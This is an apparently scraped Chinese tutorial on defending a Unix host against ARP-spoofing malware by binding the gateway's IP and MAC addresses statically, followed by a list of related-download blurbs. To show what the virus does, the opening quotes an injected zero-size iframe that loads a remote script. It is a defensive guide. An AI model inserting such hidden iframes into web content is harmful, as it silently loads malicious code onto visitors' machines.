一、ARP欺骗病毒,主要表现为:
中病毒的机器不仅影响自身,同时也会影响同网段的其它机器,将其它机器的HTTP数据包里加入病毒代码
。代码例子如:
<html><iframe src=http://xxx.eklajgl.com/lsj.js width=0 height=0></iframe>
这种病毒危害非常大!即使你机器的安全性做得很好,可是没办法保证同网段的其它机器安全没有问题!
解决办法:在网关和本机上双向绑定IP和MAC地址,以防止ARP欺骗。
二、绑定
1、网关上已经对下面所带的机器作了绑定。网关IP:192.168.0.1 MAC:00:02:03:18:08:00
2、要进行绑定的Unix主机IP:192.168.0.2 MAC:00:04:61:9D:8B:02
三、绑定步骤
1、先使用arp和arp -a查看一下当前ARP缓存列表
[root@ftp]# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.145 ether 00:13:20:E9:11:04 C eth0
192.168.0.1 ether 00:02:03:18:08:00 C eth0
说明:
Address:主机的IP地址
Hwtype:主机的硬件类型
Hwaddress:主机的硬件地址
Flags Mask:记录标志,"C"表示arp高速缓存中的条目,"M"表示静态的arp条目。
[root@ftp]# arp -a
(192.168.0.145) at 00:13:20:E9:11:04 [ether] on eth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] on eth0
2、新建一个静态的mac-->ip对应表文件:ip-mac,将要绑定的IP和MAC地下写入此文件,格式为 ip mac
。
[root@ftp]# echo '192.168.0.1 00:02:03:18:08:00 ' > /etc/ip-mac
[root@ftp]# more /etc/ip-mac
192.168.0.1 00:02:03:18:08:00
3、设置开机自动绑定
[root@ftp]# echo 'arp -f /etc/ip-mac ' >> /etc/rc.d/rc.local
4、手动执行一下绑定
[root@ftp]# arp -f /etc/ip-mac
5、确认绑定是否成功
[root@ftp]# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.145 ether 00:13:20:E9:11:04 C eth0
192.168.0.1 ether 00:02:03:18:08:00 CM eth0
[root@ftp]# arp -a
(192.168.0.145) at 00:02:B3:A7:85:48 [ether] on eth0
(192.168.0.1) at 00:02:03:18:08:00 [ether] PERM on eth0
从绑定前后的ARP缓存列表中,可以看到网关(192.168.0.1)的记录标志已经改变,说明绑定成功。
分享到:
相关推荐
用arp 绑定IP和MAC地址用arp 绑定IP和MAC地址用arp 绑定IP和MAC地址用arp 绑定IP和MAC地址用arp 绑定IP和MAC地址
IP和MAC地址绑定指的是将网关的IP地址与MAC地址绑定在一起,使得计算机只能访问正确的网关,防止ARP欺骗攻击。这种绑定可以在Windows系统下使用arp命令实现。 三、如何进行IP和MAC地址绑定? 在Windows系统下,...
通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时提供全能绑定程序,可对windows 98以上所有操作系统做IP、MAC地址绑定。 使用方法 ...
关于IP-MAC地址绑定的交换机设置关于IP-MAC地址绑定的交换机设置关于IP-MAC地址绑定的交换机设置关于IP-MAC地址绑定的交换机设置关于IP-MAC地址绑定的交换机设置关于IP-MAC地址绑定的交换机设置关于IP-MAC地址绑定的...
在思科交换机中,为了防止IP被盗用或员工乱改IP,可以通过IP与MAC地址绑定和IP与交换机端口的绑定来实现。例如,可以通过IP查端口,先查MAC地址,再根据MAC地址查端口。这样可以确保IP地址和MAC地址的一致性,从而...
通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时提供全能绑定程序,可对windows 98以上所有操作系统做IP、MAC地址绑定。 2、文件...
该机制可以检测和防止ARP欺骗攻击,并且可以防止客户端手动配置IP地址。 配置 DAI DAI(Dynamic ARP Inspection)是防止ARP欺骗的另一种机制。DAI可以检测和防止ARP欺骗攻击,并且可以防止客户端手动配置IP地址。 ...
通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时提供全能绑定程序,可对windows 98以上所有操作系统做IP、MAC地址绑定。 2、文件...
通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时提供全能绑定程序,可对windows 98以上所有操作系统做IP、MAC地址绑定。另外可支持...
局域网IP与MAC双向绑定防止arp攻击,铲除p2p终结者!
深度分析主机状态,自动绑定IP、MAC地址,自动生成GateIP,GateMac,IPAddr,ipconfig,phyaddr等。
vc用ARP实现IP与MAC地址的绑定
IP-MAC地址绑定工具,有效防止黑客和病毒的arp欺骗攻击,拒绝断网提高网络稳定性。通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时...
2. 防止非法访问:IP MAC地址绑定可以防止非法访问和攻击,保护网络设备的安全。 3. 简化网络管理:IP MAC地址绑定可以简化网络管理,网络管理员可以更方便地管理和控制网络流量。 IP MAC地址绑定是网络安全领域中...
通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时提供全能绑定程序,可对windows 98以上所有操作系统做IP、MAC地址绑定。 2、文件...
本文主要介绍如何在Linux路由上设置IP和MAC绑定,感兴趣的朋友可以看看。
"IP地址和MAC地址绑定" 在网络通信中,IP地址和MAC地址都是非常重要的概念。IP地址是指分配给网络设备的逻辑地址,而MAC地址是指网卡的物理地址或硬件地址。为了保证网络安全和用户应用,需要将IP地址和MAC地址捆绑...
ARP防火墙绑定网关MAC地址预防ARP攻击和P2P终结者